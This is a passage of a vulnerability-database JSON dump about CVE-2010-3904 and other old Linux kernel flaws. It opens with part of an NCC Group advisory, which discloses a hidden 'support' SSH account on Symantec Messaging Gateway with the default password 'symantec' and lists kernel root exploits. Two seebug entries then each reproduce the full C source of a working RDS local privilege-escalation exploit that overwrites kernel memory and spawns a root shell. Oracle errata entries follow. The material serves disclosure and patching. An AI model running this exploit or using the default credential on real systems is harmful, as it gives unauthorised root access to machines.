and escalate to root.\r\n\r\n=================\r\nTechnical Details\r\n=================\r\nIV. PROOF OF CONCEPT\r\n-------------------------\r\nBoth the install wizard and the documentation prompt the administrator to change the password for the "admin" account, for both the UI and for SSH to the operating system. This admin account can SSH in to the appliance, with the new chosen password, and has a restricted shell environment where only certain application administration commands are possible. \r\n\r\nIt is not possible to login as root. However, there is another account "support" which has a default password of "symantec" which is not mentioned anywhere in the installer or documentation (as far as I can see) and the password is not changed as part of the installation process. This account is able to login to the OS via SSH, and does not have a restricted shell environment.\r\n\r\nAdditionally, the Linux Kernel is very old (2007) so suffers from multiple privilege escalation issues.\r\n\r\n[+] Results for kernel version 2.6.18-274.3.1.2.el5_sms\r\n\r\nPotential exploits:\r\n\r\n* Linux Kernel BCM Local Root Exploit\r\n CVE: CVE-2010-2959\r\n Affects kernels: 2.6.0-2.6.36rc1\r\n Exploits:\r\n http://www.exploit-db.com/exploits/14814\r\n\r\n* Linux Kernel RDS protocol Local Root Exploit\r\n CVE: CVE-2010-3904\r\n Affects kernels: 2.6.0-2.6.36rc8\r\n Exploits:\r\n http://www.exploit-db.com/exploits/15285\r\n\r\n* Linux Kernel econet_sendmsg() - half-nelson Local Root Exploit\r\n CVE: CVE-2010-3848 \r\n Affects kernels: 2.6.0-2.6.36.2 \r\n Exploits: \r\n http://www.exploit-db.com/exploits/17787 \r\n \r\n* Linux Kernel Unknown Local Root Exploit \r\n CVE: CVE-None \r\n Affects kernels: 2.6.18-2.6.20\r\n Exploits:\r\n http://www.exploit-db.com/exploits/10613\r\n\r\n* Linux Kernel sock_sendpage() (Wunderbar Emporium) Local Root Exploit\r\n CVE: CVE-2009-2692\r\n Affects kernels: 2.6.0-2.6.31rc3\r\n Exploits:\r\n http://www.exploit-db.com/exploits/9641\r\n http://www.exploit-db.com/exploits/9545\r\n http://www.exploit-db.com/exploits/9479\r\n http://www.exploit-db.com/exploits/9436\r\n http://www.exploit-db.com/exploits/9435\r\n http://www.grsecurity.net/~spender/enlightenment.tgz\r\n\r\n* Linux Kernel pipe.c (MooseCox) Local Root Exploit\r\n CVE: CVE-2009-3547\r\n Affects kernels: 2.6.0-2.6.32rc5\r\n Exploits:\r\n http://www.exploit-db.com/exploits/10018\r\n http://www.grsecurity.net/~spender/enlightenment.tgz\r\n\r\n* Linux Kernel ReiserFS xattr Local Root Exploit\r\n CVE: CVE-2010-1146\r\n Affects kernels: 2.6.0-2.6.34rc3\r\n Exploits:\r\n http://www.exploit-db.com/exploits/12130\r\n\r\n* Linux Kernel vmsplice Local Root Exploit\r\n CVE: CVE-2008-0009\r\n Affects kernels: 2.6.17-2.6.24.1\r\n Exploits:\r\n http://www.exploit-db.com/exploits/5092\r\n http://www.exploit-db.com/exploits/5093\r\n\r\n* Linux Kernel ec_dev_ioctl() - half-nelson Local Root Exploit\r\n CVE: CVE-2010-3850\r\n Affects kernels: 2.6.0-2.6.36.2\r\n Exploits:\r\n http://www.exploit-db.com/exploits/17787\r\n http://www.exploit-db.com/exploits/15704\r\n\r\n* Linux Kernel ACPI custom_method Local Root Exploit\r\n CVE: CVE-2010-4347\r\n Affects kernels: 2.6.0-2.6.37rc2\r\n Exploits:\r\n http://www.exploit-db.com/exploits/15774\r\n\r\n* Linux Kernel ftruncate()/open() Local Root Exploit\r\n CVE: CVE-2008-4210\r\n Affects kernels: 2.6.0-2.6.22\r\n Exploits:\r\n http://www.exploit-db.com/exploits/6851\r\n\r\n* Linux Kernel put_user() - full-nelson Local Root Exploit\r\n CVE: CVE-2010-4258\r\n Affects kernels: 2.6.0-2.6.37\r\n Exploits:\r\n http://www.exploit-db.com/exploits/15704\r\n\r\n* Linux Kernel sock_no_sendpage() - full-nelson Local Root Exploit\r\n CVE: CVE-2010-3849\r\n Affects kernels: 2.6.0-2.6.37\r\n Exploits:\r\n http://www.exploit-db.com/exploits/15704\r\n\r\n* Linux Kernel ipc - half-nelson Local Root Exploit\r\n CVE: CVE-2010-4073\r\n Affects kernels: 2.6.0-2.6.37rc1\r\n Exploits:\r\n http://www.exploit-db.com/exploits/17787\r\n\r\n* Linux Kernel SELinux/RHEL5 (Cheddar Bay) Local Root Exploit\r\n CVE: CVE-None\r\n Affects kernels: 2.6.9-2.6.30\r\n Exploits:\r\n http://www.exploit-db.com/exploits/9208\r\n http://www.exploit-db.com/exploits/9191\r\n http://www.grsecurity.net/~spender/enlightenment.tgz\r\n\r\n* Linux Kernel exit_notify() Local Root Exploit\r\n CVE: CVE-2009-1337\r\n Affects kernels: 2.6.0-2.6.29\r\n Exploits:\r\n http://www.exploit-db.com/exploits/8369\r\n\r\n* Linux Kernel system call emulation Local Root Exploit\r\n CVE: CVE-2007-4573\r\n Affects kernels: 2.6.0-2.6.22.7\r\n Exploits:\r\n http://www.exploit-db.com/exploits/4460\r\n\r\n* Linux Kernel set_selection() UTF-8 Off By One Local Root Exploit\r\n CVE: CVE-2009-1046\r\n Affects kernels: 2.6.0-2.6.28.3\r\n Exploits:\r\n http://www.exploit-db.com/exploits/9083\r\n\r\n===============\r\nFix Information\r\n===============\r\n\r\nAn updated version of the software has been released to address the vulnerability:\r\nhttp://www.symantec.com/security_response/securityupdates/detail.jsp?fid=security_advisory&pvid=security_advisory&year=2012&suid=20120827_00\r\n\r\nNCC Group Research\r\nhttp://www.nccgroup.com/research\r\n\r\n\r\nFor more information please visit <a href="http://www.mimecast.com">http://www.mimecast.com<br>\r\nThis email message has been delivered safely and archived online by Mimecast.\r\n</a>\r\n", "cvss3": {}, "published": "2012-12-02T00:00:00", "type": "securityvulns", "title": "NGS000267 Technical Advisory: Symantec Messaging Gateway SSH with backdoor user account plus privilege escalation to root due to very old Kernel", "bulletinFamily": "software", "hackapp": {}, "cvss2": {}, "cvelist": ["CVE-2010-3904", "CVE-2007-4573", "CVE-2010-4073", "CVE-2009-2692", "CVE-2009-1046", "CVE-2010-2959", "CVE-2008-0009", "CVE-2010-1146", "CVE-2010-3850", "CVE-2010-4258", "CVE-2009-3547", "CVE-2010-3848", "CVE-2009-1337", "CVE-2010-4347", "CVE-2008-4210", "CVE-2010-3849"], "modified": "2012-12-02T00:00:00", "id": "SECURITYVULNS:DOC:28783", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:28783", "sourceData": "", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "seebug": [{"lastseen": "2017-11-19T15:46:25", "description": "No description provided by source.", "cvss3": {}, "published": "2014-07-01T00:00:00", "title": "Linux Kernel <= 2.6.36-rc8 - RDS Protocol Local Privilege Escalation", "type": "seebug", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2010-3904"], "modified": "2014-07-01T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-70036", "id": "SSV:70036", "sourceData": "\n //source: http://www.vsecurity.com/resources/advisory/20101019-1/\r\n\r\n/* \r\n * Linux Kernel <= 2.6.36-rc8 RDS privilege escalation exploit\r\n * CVE-2010-3904\r\n * by Dan Rosenberg <drosenberg@vsecurity.com>\r\n *\r\n * Copyright 2010 Virtual Security Research, LLC\r\n *\r\n * The handling functions for sending and receiving RDS messages\r\n * use unchecked __copy_*_user_inatomic functions without any\r\n * access checks on user-provided pointers. As a result, by\r\n * passing a kernel address as an iovec base address in recvmsg-style\r\n * calls, a local user can overwrite arbitrary kernel memory, which\r\n * can easily be used to escalate privileges to root. Alternatively,\r\n * an arbitrary kernel read can be performed via sendmsg calls.\r\n *\r\n * This exploit is simple - it resolves a few kernel symbols,\r\n * sets the security_ops to the default structure, then overwrites\r\n * a function pointer (ptrace_traceme) in that structure to point\r\n * to the payload. After triggering the payload, the original\r\n * value is restored. Hard-coding the offset of this function\r\n * pointer is a bit inelegant, but I wanted to keep it simple and\r\n * architecture-independent (i.e. no inline assembly).\r\n *\r\n * The vulnerability is yet another example of why you shouldn't\r\n * allow loading of random packet families unless you actually\r\n * need them.\r\n *\r\n * Greets to spender, kees, taviso, hawkes, team lollerskaters,\r\n * joberheide, bla, sts, and VSR\r\n *\r\n */\r\n\r\n\r\n#include <stdio.h>\r\n#include <unistd.h>\r\n#include <stdlib.h>\r\n#include <fcntl.h>\r\n#include <sys/types.h>\r\n#include <sys/socket.h>\r\n#include <netinet/in.h>\r\n#include <errno.h>\r\n#include <string.h>\r\n#include <sys/ptrace.h>\r\n#include <sys/utsname.h>\r\n\r\n#define RECVPORT 5555 \r\n#define SENDPORT 6666\r\n\r\nint prep_sock(int port)\r\n{\r\n\t\r\n\tint s, ret;\r\n\tstruct sockaddr_in addr;\r\n\r\n\ts = socket(PF_RDS, SOCK_SEQPACKET, 0);\r\n\r\n\tif(s < 0) {\r\n\t\tprintf("[*] Could not open socket.\\n");\r\n\t\texit(-1);\r\n\t}\r\n\t\r\n\tmemset(&addr, 0, sizeof(addr));\r\n\r\n\taddr.sin_addr.s_addr = inet_addr("127.0.0.1");\r\n\taddr.sin_family = AF_INET;\r\n\taddr.sin_port = htons(port);\r\n\r\n\tret = bind(s, (struct sockaddr *)&addr, sizeof(addr));\r\n\r\n\tif(ret < 0) {\r\n\t\tprintf("[*] Could not bind socket.\\n");\r\n\t\texit(-1);\r\n\t}\r\n\r\n\treturn s;\r\n\r\n}\r\n\r\nvoid get_message(unsigned long address, int sock)\r\n{\r\n\r\n\trecvfrom(sock, (void *)address, sizeof(void *), 0,\r\n\t\t NULL, NULL);\r\n\r\n}\r\n\r\nvoid send_message(unsigned long value, int sock)\r\n{\r\n\t\r\n\tint size, ret;\r\n\tstruct sockaddr_in recvaddr;\r\n\tstruct msghdr msg;\r\n\tstruct iovec iov;\r\n\tunsigned long buf;\r\n\t\r\n\tmemset(&recvaddr, 0, sizeof(recvaddr));\r\n\r\n\tsize = sizeof(recvaddr);\r\n\r\n\trecvaddr.sin_port = htons(RECVPORT);\r\n\trecvaddr.sin_family = AF_INET;\r\n\trecvaddr.sin_addr.s_addr = inet_addr("127.0.0.1");\r\n\r\n\tmemset(&msg, 0, sizeof(msg));\r\n\t\r\n\tmsg.msg_name = &recvaddr;\r\n\tmsg.msg_namelen = sizeof(recvaddr);\r\n\tmsg.msg_iovlen = 1;\r\n\t\r\n\tbuf = value;\r\n\r\n\tiov.iov_len = sizeof(buf);\r\n\tiov.iov_base = &buf;\r\n\r\n\tmsg.msg_iov = &iov;\r\n\r\n\tret = sendmsg(sock, &msg, 0);\r\n\tif(ret < 0) {\r\n\t\tprintf("[*] Something went wrong sending.\\n");\r\n\t\texit(-1);\r\n\t}\r\n}\r\n\r\nvoid write_to_mem(unsigned long addr, unsigned long value, int sendsock, int recvsock)\r\n{\r\n\r\n\tif(!fork()) {\r\n\t\t\tsleep(1);\r\n\t\t\tsend_message(value, sendsock);\r\n\t\t\texit(1);\r\n\t}\r\n\telse {\r\n\t\tget_message(addr, recvsock);\r\n\t\twait(NULL);\r\n\t}\r\n\r\n}\r\n\r\ntypedef int __attribute__((regparm(3))) (* _commit_creds)(unsigned long cred);\r\ntypedef unsigned long __attribute__((regparm(3))) (* _prepare_kernel_cred)(unsigned long cred);\r\n_commit_creds commit_creds;\r\n_prepare_kernel_cred prepare_kernel_cred;\r\n\r\nint __attribute__((regparm(3)))\r\ngetroot(void * file, void * vma)\r\n{\r\n\r\n\tcommit_creds(prepare_kernel_cred(0));\r\n\treturn -1;\t\r\n\r\n}\r\n\r\n/* thanks spender... */\r\nunsigned long get_kernel_sym(char *name)\r\n{\r\n\tFILE *f;\r\n\tunsigned long addr;\r\n\tchar dummy;\r\n\tchar sname[512];\r\n\tstruct utsname ver;\r\n\tint ret;\r\n\tint rep = 0;\r\n\tint oldstyle = 0;\r\n\r\n\tf = fopen("/proc/kallsyms", "r");\r\n\tif (f == NULL) {\r\n\t\tf = fopen("/proc/ksyms", "r");\r\n\t\tif (f == NULL)\r\n\t\t\tgoto fallback;\r\n\t\toldstyle = 1;\r\n\t}\r\n\r\nrepeat:\r\n\tret = 0;\r\n\twhile(ret != EOF) {\r\n\t\tif (!oldstyle)\r\n\t\t\tret = fscanf(f, "%p %c %s\\n", (void **)&addr, &dummy, sname);\r\n\t\telse {\r\n\t\t\tret = fscanf(f, "%p %s\\n", (void **)&addr, sname);\r\n\t\t\tif (ret == 2) {\r\n\t\t\t\tchar *p;\r\n\t\t\t\tif (strstr(sname, "_O/") || strstr(sname, "_S."))\r\n\t\t\t\t\tcontinue;\r\n\t\t\t\tp = strrchr(sname, '_');\r\n\t\t\t\tif (p > ((char *)sname + 5) && !strncmp(p - 3, "smp", 3)) {\r\n\t\t\t\t\tp = p - 4;\r\n\t\t\t\t\twhile (p > (char *)sname && *(p - 1) == '_')\r\n\t\t\t\t\t\tp--;\r\n\t\t\t\t\t*p = '\\0';\r\n\t\t\t\t}\r\n\t\t\t}\r\n\t\t}\r\n\t\tif (ret == 0) {\r\n\t\t\tfscanf(f, "%s\\n", sname);\r\n\t\t\tcontinue;\r\n\t\t}\r\n\t\tif (!strcmp(name, sname)) {\r\n\t\t\tfprintf(stdout, " [+] Resolved %s to %p%s\\n", name, (void *)addr, rep ? " (via System.map)" : "");\r\n\t\t\tfclose(f);\r\n\t\t\treturn addr;\r\n\t\t}\r\n\t}\r\n\r\n\tfclose(f);\r\n\tif (rep)\r\n\t\treturn 0;\r\nfallback:\r\n\t/* didn't find the symbol, let's retry with the System.map\r\n\t dedicated to the pointlessness of Russell Coker's SELinux\r\n\t test machine (why does he keep upgrading the kernel if\r\n\t "all necessary security can be provided by SE Linux"?)\r\n\t*/\r\n\tuname(&ver);\r\n\tif (strncmp(ver.release, "2.6", 3))\r\n\t\toldstyle = 1;\r\n\tsprintf(sname, "/boot/System.map-%s", ver.release);\r\n\tf = fopen(sname, "r");\r\n\tif (f == NULL)\r\n\t\treturn 0;\r\n\trep = 1;\r\n\tgoto repeat;\r\n}\r\n\r\nint main(int argc, char * argv[])\r\n{\r\n\tunsigned long sec_ops, def_ops, cap_ptrace, target;\r\n\tint sendsock, recvsock;\r\n\tstruct utsname ver;\r\n\r\n\tprintf("[*] Linux kernel >= 2.6.30 RDS socket exploit\\n");\r\n\tprintf("[*] by Dan Rosenberg\\n");\r\n\r\n\tuname(&ver);\r\n\r\n\tif(strncmp(ver.release, "2.6.3", 5)) {\r\n\t\tprintf("[*] Your kernel is not vulnerable.\\n");\r\n\t\treturn -1;\r\n\t}\t\r\n\r\n\t/* Resolve addresses of relevant symbols */\r\n\tprintf("[*] Resolving kernel addresses...\\n");\r\n\tsec_ops = get_kernel_sym("security_ops");\r\n\tdef_ops = get_kernel_sym("default_security_ops");\r\n\tcap_ptrace = get_kernel_sym("cap_ptrace_traceme");\r\n\tcommit_creds = (_commit_creds) get_kernel_sym("commit_creds");\r\n\tprepare_kernel_cred = (_prepare_kernel_cred) get_kernel_sym("prepare_kernel_cred");\r\n\r\n\tif(!sec_ops || !def_ops || !cap_ptrace || !commit_creds || !prepare_kernel_cred) {\r\n\t\tprintf("[*] Failed to resolve kernel symbols.\\n");\r\n\t\treturn -1;\r\n\t}\r\n\r\n\t/* Calculate target */\r\n\ttarget = def_ops + sizeof(void *) + ((11 + sizeof(void *)) & ~(sizeof(void *) - 1));\r\n\r\n\tsendsock = prep_sock(SENDPORT);\r\n\trecvsock = prep_sock(RECVPORT);\r\n\r\n\t/* Reset security ops */\r\n\tprintf("[*] Overwriting security ops...\\n");\r\n\twrite_to_mem(sec_ops, def_ops, sendsock, recvsock);\r\n\r\n\t/* Overwrite ptrace_traceme security op fptr */\r\n\tprintf("[*] Overwriting function pointer...\\n");\r\n\twrite_to_mem(target, (unsigned long)&getroot, sendsock, recvsock);\r\n\r\n\t/* Trigger the payload */\r\n\tprintf("[*] Triggering payload...\\n");\r\n\tptrace(PTRACE_TRACEME, 1, NULL, NULL);\r\n\t\r\n\t/* Restore the ptrace_traceme security op */\r\n\tprintf("[*] Restoring function pointer...\\n");\r\n\twrite_to_mem(target, cap_ptrace, sendsock, recvsock);\r\n\r\n\tif(getuid()) {\r\n\t\tprintf("[*] Exploit failed to get root.\\n");\r\n\t\treturn -1;\r\n\t}\r\n\r\n\tprintf("[*] Got root!\\n");\r\n\texecl("/bin/sh", "sh", NULL);\r\n\r\n}\r\n\n ", "sourceHref": "https://www.seebug.org/vuldb/ssvid-70036", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-11-19T18:07:20", "description": "No description provided by source.", "cvss3": {}, "published": "2010-10-26T00:00:00", "type": "seebug", "title": "Linux RDS Protocol Local Privilege Escalation", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2010-3904"], "modified": "2010-10-26T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-20191", "id": "SSV:20191", "sourceData": "\n Source: http://www.vsecurity.com/resources/advisory/20101019-1/\r\n \r\n/*\r\n * Linux Kernel <= 2.6.36-rc8 RDS privilege escalation exploit\r\n * CVE-2010-3904\r\n * by Dan Rosenberg <drosenberg@vsecurity.com>\r\n *\r\n * Copyright 2010 Virtual Security Research, LLC\r\n *\r\n * The handling functions for sending and receiving RDS messages\r\n * use unchecked __copy_*_user_inatomic functions without any\r\n * access checks on user-provided pointers. As a result, by\r\n * passing a kernel address as an iovec base address in recvmsg-style\r\n * calls, a local user can overwrite arbitrary kernel memory, which\r\n * can easily be used to escalate privileges to root. Alternatively,\r\n * an arbitrary kernel read can be performed via sendmsg calls.\r\n *\r\n * This exploit is simple - it resolves a few kernel symbols,\r\n * sets the security_ops to the default structure, then overwrites\r\n * a function pointer (ptrace_traceme) in that structure to point\r\n * to the payload. After triggering the payload, the original\r\n * value is restored. Hard-coding the offset of this function\r\n * pointer is a bit inelegant, but I wanted to keep it simple and\r\n * architecture-independent (i.e. no inline assembly).\r\n *\r\n * The vulnerability is yet another example of why you shouldn't\r\n * allow loading of random packet families unless you actually\r\n * need them.\r\n *\r\n * Greets to spender, kees, taviso, hawkes, team lollerskaters,\r\n * joberheide, bla, sts, and VSR\r\n *\r\n */\r\n \r\n \r\n#include <stdio.h>\r\n#include <unistd.h>\r\n#include <stdlib.h>\r\n#include <fcntl.h>\r\n#include <sys/types.h>\r\n#include <sys/socket.h>\r\n#include <netinet/in.h>\r\n#include <errno.h>\r\n#include <string.h>\r\n#include <sys/ptrace.h>\r\n#include <sys/utsname.h>\r\n \r\n#define RECVPORT 5555\r\n#define SENDPORT 6666\r\n \r\nint prep_sock(int port)\r\n{\r\n \r\n int s, ret;\r\n struct sockaddr_in addr;\r\n \r\n s = socket(PF_RDS, SOCK_SEQPACKET, 0);\r\n \r\n if(s < 0) {\r\n printf("[*] Could not open socket.\\n");\r\n exit(-1);\r\n }\r\n \r\n memset(&addr, 0, sizeof(addr));\r\n \r\n addr.sin_addr.s_addr = inet_addr("127.0.0.1");\r\n addr.sin_family = AF_INET;\r\n addr.sin_port = htons(port);\r\n \r\n ret = bind(s, (struct sockaddr *)&addr, sizeof(addr));\r\n \r\n if(ret < 0) {\r\n printf("[*] Could not bind socket.\\n");\r\n exit(-1);\r\n }\r\n \r\n return s;\r\n \r\n}\r\n \r\nvoid get_message(unsigned long address, int sock)\r\n{\r\n \r\n recvfrom(sock, (void *)address, sizeof(void *), 0,\r\n NULL, NULL);\r\n \r\n}\r\n \r\nvoid send_message(unsigned long value, int sock)\r\n{\r\n \r\n int size, ret;\r\n struct sockaddr_in recvaddr;\r\n struct msghdr msg;\r\n struct iovec iov;\r\n unsigned long buf;\r\n \r\n memset(&recvaddr, 0, sizeof(recvaddr));\r\n \r\n size = sizeof(recvaddr);\r\n \r\n recvaddr.sin_port = htons(RECVPORT);\r\n recvaddr.sin_family = AF_INET;\r\n recvaddr.sin_addr.s_addr = inet_addr("127.0.0.1");\r\n \r\n memset(&msg, 0, sizeof(msg));\r\n \r\n msg.msg_name = &recvaddr;\r\n msg.msg_namelen = sizeof(recvaddr);\r\n msg.msg_iovlen = 1;\r\n \r\n buf = value;\r\n \r\n iov.iov_len = sizeof(buf);\r\n iov.iov_base = &buf;\r\n \r\n msg.msg_iov = &iov;\r\n \r\n ret = sendmsg(sock, &msg, 0);\r\n if(ret < 0) {\r\n printf("[*] Something went wrong sending.\\n");\r\n exit(-1);\r\n }\r\n}\r\n \r\nvoid write_to_mem(unsigned long addr, unsigned long value, int sendsock, int recvsock)\r\n{\r\n \r\n if(!fork()) {\r\n sleep(1);\r\n send_message(value, sendsock);\r\n exit(1);\r\n }\r\n else {\r\n get_message(addr, recvsock);\r\n wait(NULL);\r\n }\r\n \r\n}\r\n \r\ntypedef int __attribute__((regparm(3))) (* _commit_creds)(unsigned long cred);\r\ntypedef unsigned long __attribute__((regparm(3))) (* _prepare_kernel_cred)(unsigned long cred);\r\n_commit_creds commit_creds;\r\n_prepare_kernel_cred prepare_kernel_cred;\r\n \r\nint __attribute__((regparm(3)))\r\ngetroot(void * file, void * vma)\r\n{\r\n \r\n commit_creds(prepare_kernel_cred(0));\r\n return -1; \r\n \r\n}\r\n \r\n/* thanks spender... */\r\nunsigned long get_kernel_sym(char *name)\r\n{\r\n FILE *f;\r\n unsigned long addr;\r\n char dummy;\r\n char sname[512];\r\n struct utsname ver;\r\n int ret;\r\n int rep = 0;\r\n int oldstyle = 0;\r\n \r\n f = fopen("/proc/kallsyms", "r");\r\n if (f == NULL) {\r\n f = fopen("/proc/ksyms", "r");\r\n if (f == NULL)\r\n goto fallback;\r\n oldstyle = 1;\r\n }\r\n \r\nrepeat:\r\n ret = 0;\r\n while(ret != EOF) {\r\n if (!oldstyle)\r\n ret = fscanf(f, "%p %c %s\\n", (void **)&addr, &dummy, sname);\r\n else {\r\n ret = fscanf(f, "%p %s\\n", (void **)&addr, sname);\r\n if (ret == 2) {\r\n char *p;\r\n if (strstr(sname, "_O/") || strstr(sname, "_S."))\r\n continue;\r\n p = strrchr(sname, '_');\r\n if (p > ((char *)sname + 5) && !strncmp(p - 3, "smp", 3)) {\r\n p = p - 4;\r\n while (p > (char *)sname && *(p - 1) == '_')\r\n p--;\r\n *p = '\\0';\r\n }\r\n }\r\n }\r\n if (ret == 0) {\r\n fscanf(f, "%s\\n", sname);\r\n continue;\r\n }\r\n if (!strcmp(name, sname)) {\r\n fprintf(stdout, " [+] Resolved %s to %p%s\\n", name, (void *)addr, rep ? " (via System.map)" : "");\r\n fclose(f);\r\n return addr;\r\n }\r\n }\r\n \r\n fclose(f);\r\n if (rep)\r\n return 0;\r\nfallback:\r\n /* didn't find the symbol, let's retry with the System.map\r\n dedicated to the pointlessness of Russell Coker's SELinux\r\n test machine (why does he keep upgrading the kernel if\r\n "all necessary security can be provided by SE Linux"?)\r\n */\r\n uname(&ver);\r\n if (strncmp(ver.release, "2.6", 3))\r\n oldstyle = 1;\r\n sprintf(sname, "/boot/System.map-%s", ver.release);\r\n f = fopen(sname, "r");\r\n if (f == NULL)\r\n return 0;\r\n rep = 1;\r\n goto repeat;\r\n}\r\n \r\nint main(int argc, char * argv[])\r\n{\r\n unsigned long sec_ops, def_ops, cap_ptrace, target;\r\n int sendsock, recvsock;\r\n struct utsname ver;\r\n \r\n printf("[*] Linux kernel >= 2.6.30 RDS socket exploit\\n");\r\n printf("[*] by Dan Rosenberg\\n");\r\n \r\n uname(&ver);\r\n \r\n if(strncmp(ver.release, "2.6.3", 5)) {\r\n printf("[*] Your kernel is not vulnerable.\\n");\r\n return -1;\r\n } \r\n \r\n /* Resolve addresses of relevant symbols */\r\n printf("[*] Resolving kernel addresses...\\n");\r\n sec_ops = get_kernel_sym("security_ops");\r\n def_ops = get_kernel_sym("default_security_ops");\r\n cap_ptrace = get_kernel_sym("cap_ptrace_traceme");\r\n commit_creds = (_commit_creds) get_kernel_sym("commit_creds");\r\n prepare_kernel_cred = (_prepare_kernel_cred) get_kernel_sym("prepare_kernel_cred");\r\n \r\n if(!sec_ops || !def_ops || !cap_ptrace || !commit_creds || !prepare_kernel_cred) {\r\n printf("[*] Failed to resolve kernel symbols.\\n");\r\n return -1;\r\n }\r\n \r\n /* Calculate target */\r\n target = def_ops + sizeof(void *) + ((11 + sizeof(void *)) & ~(sizeof(void *) - 1));\r\n \r\n sendsock = prep_sock(SENDPORT);\r\n recvsock = prep_sock(RECVPORT);\r\n \r\n /* Reset security ops */\r\n printf("[*] Overwriting security ops...\\n");\r\n write_to_mem(sec_ops, def_ops, sendsock, recvsock);\r\n \r\n /* Overwrite ptrace_traceme security op fptr */\r\n printf("[*] Overwriting function pointer...\\n");\r\n write_to_mem(target, (unsigned long)&getroot, sendsock, recvsock);\r\n \r\n /* Trigger the payload */\r\n printf("[*] Triggering payload...\\n");\r\n ptrace(PTRACE_TRACEME, 1, NULL, NULL);\r\n \r\n /* Restore the ptrace_traceme security op */\r\n printf("[*] Restoring function pointer...\\n");\r\n write_to_mem(target, cap_ptrace, sendsock, recvsock);\r\n \r\n if(getuid()) {\r\n printf("[*] Exploit failed to get root.\\n");\r\n return -1;\r\n }\r\n \r\n printf("[*] Got root!\\n");\r\n execl("/bin/sh", "sh", NULL);\r\n \r\n}\r\n\n ", "sourceHref": "https://www.seebug.org/vuldb/ssvid-20191", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-11-19T18:07:41", "description": "BUGTRAQ ID: 44219\r\nCVE ID: CVE-2010-3904\r\n\r\nLinux Kernel\u662f\u5f00\u653e\u6e90\u7801\u64cd\u4f5c\u7cfb\u7edfLinux\u6240\u4f7f\u7528\u7684\u5185\u6838\u3002\r\n\r\n\u5728Linux\u4e0a\uff0c\u4f7f\u7528\u4e86iovec\u7ed3\u6784\u6267\u884crecvmsg()\u6837\u5f0f\u5957\u63a5\u5b57\u8c03\u7528\u4ee5\u5141\u8bb8\u7528\u6237\u6307\u5b9a\u7528\u4e8e\u63a5\u6536\u5957\u63a5\u5b57\u6570\u636e\u7684\u7f13\u51b2\u533a\u57fa\u5740\u548c\u5927\u5c0f\u3002\u6bcf\u4e2a\u62a5\u6587\u5bb6\u65cf\u8d1f\u8d23\u5b9a\u4e49\u62f7\u8d1d\u5957\u63a5\u5b57\u6570\u636e\u7684\u51fd\u6570\uff0c\u5185\u6838\u63a5\u6536\u5230\u8fd9\u4e9b\u6570\u636e\u540e\u8fd4\u56de\u7ed9\u7528\u6237\u7a7a\u95f4\u4ee5\u4fbf\u7528\u6237\u7a0b\u5e8f\u5904\u7406\u6240\u63a5\u6536\u5230\u7684\u7f51\u7edc\u6570\u636e\u3002\r\n\r\n\u5728\u5c06\u6570\u636e\u62f7\u8d1d\u5230\u7528\u6237\u7a7a\u95f4\u65f6\uff0cRDS\u534f\u8bae\u6ca1\u6709\u786e\u8ba4\u7528\u6237\u6240\u63d0\u4f9biovec\u7ed3\u6784\u7684\u57fa\u5740\u6307\u5411\u4e86\u6709\u6548\u7684\u7528\u6237\u7a7a\u95f4\u5730\u5740\u4fbf\u4f7f\u7528 __copy_to_user_inatomic()\u51fd\u6570\u62f7\u8d1d\u6570\u636e\u3002\u56e0\u6b64\uff0c\u5982\u679c\u63d0\u4f9b\u5185\u6838\u5730\u5740\u4e3aiovec\u57fa\u5740\u5e76\u53d1\u5e03recvmsg()\u6837\u5f0f\u5957\u63a5\u5b57\u8c03\u7528\uff0c\u672c\u5730\u7528\u6237\u5c31\u53ef\u4ee5\u5411\u5185\u6838\u5185\u5b58\u4e2d\u5199\u5165\u4efb\u610f\u6570\u636e\uff0c\u5bfc\u81f4root\u7528\u6237\u6743\u9650\u63d0\u5347\u3002\n\nLinux kernel <= 2.6.36-rc8\n\u5382\u5546\u8865\u4e01\uff1a\r\n\r\nLinux\r\n-----\r\n\u76ee\u524d\u5382\u5546\u5df2\u7ecf\u53d1\u5e03\u4e86\u5347\u7ea7\u8865\u4e01\u4ee5\u4fee\u590d\u8fd9\u4e2a\u5b89\u5168\u95ee\u9898\uff0c\u8bf7\u5230\u5382\u5546\u7684\u4e3b\u9875\u4e0b\u8f7d\uff1a\r\n\r\nhttp://git.kernel.org/?p=linux/kernel/git/torvalds/linux-2.6.git;a=commitdiff;h=799c10559d60f159ab2232203f222f18fa3c4a5f", "cvss3": {}, "published": "2010-10-26T00:00:00", "type": "seebug", "title": "Linux Kernel RDS\u534f\u8bae\u672c\u5730\u6743\u9650\u63d0\u5347\u6f0f\u6d1e", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2010-3904"], "modified": "2010-10-26T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-20199", "id": "SSV:20199", "sourceData": "\n http://sebug.net/exploit/20191/\n ", "sourceHref": "https://www.seebug.org/vuldb/ssvid-20199", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "oraclelinux": [{"lastseen": "2019-05-29T18:34:22", "description": "[2.6.18-194.17.1.0.2.el5]\n- [rds] fix access issue with rds (Chris Mason) {CVE-2010-3904} [orabug 10226701]", "cvss3": {}, "published": "2010-10-22T00:00:00", "type": "oraclelinux", "title": "kernel security update", "bulletinFamily": "unix", "cvss2": {}, "cvelist": ["CVE-2010-3904"], "modified": "2010-10-22T00:00:00", "id": "ELSA-2010-2010", "href": "http://linux.oracle.com/errata/ELSA-2010-2010.html", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:39:21", "description": "[2.6.18-194.17.4.0.1.el5]\n- [xen] check to see if hypervisor supports memory reservation change\n (Chuck Anderson) [orabug 7556514]\n- Add entropy support to igb (John Sobecki) [orabug 